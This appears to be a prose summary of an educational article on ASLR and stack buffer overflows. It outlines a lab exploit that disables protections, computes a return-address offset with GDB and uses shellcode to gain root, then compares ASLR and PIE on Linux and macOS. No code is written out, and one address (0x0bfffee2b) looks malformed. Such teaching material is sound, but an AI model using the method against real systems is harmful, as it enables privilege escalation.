Understanding ASLR and Buffer Overflow Exploits on Linux

Address Space Layout Randomization (ASLR) is a security technique that randomizes the memory layout of a process to make buffer‑overflow attacks more difficult. The article begins with a brief definition of ASLR and its purpose.

It then reviews the Linux process address space, describing the order of sections from low to high addresses: code and data, heap, shared libraries, user stack, and kernel space. The user stack grows downward, and a vulnerable buffer placed on the stack can be overwritten to hijack the return address.

A concrete buffer‑overflow example is presented, based on a lab exercise. The vulnerable program stack.c contains a function bof that copies an input string into a fixed‑size buffer using strcpy . When the input exceeds BUF_SIZE , the overflow overwrites the saved return address.

The article shows how to disable ASLR on Linux, compile the program with -z execstack and -fno-stack-protector , and then craft a malicious payload ( badfile ) that contains shellcode and the target address 0x0bfffee2b . Running the program with the payload gains root privileges.

Detailed address calculations are explained: using GDB to find the base address of the buffer, computing the offset to the return address (48 bytes), and determining the exact address where the shellcode resides. Memory layout diagrams illustrate the buffer, saved frame pointer, and return address positions.

The article also demonstrates the effect of ASLR by running a simple program ( print_heap.c ) with ASLR enabled and disabled, showing how addresses change between runs.

Further discussion covers Position‑Independent Executable (PIE) on macOS, how PIE interacts with ASLR, and how disabling PIE still leaves some randomization. Screenshots illustrate the Mach‑O header flags and the resulting address slides.

In the summary, the author notes that while ASLR does not completely prevent buffer‑overflow attacks, it significantly raises the difficulty, especially on 64‑bit systems where the randomization range is large.

Author information and a reference to the textbook "Computer Systems: A Programmer's Perspective" are provided, followed by links to related reading.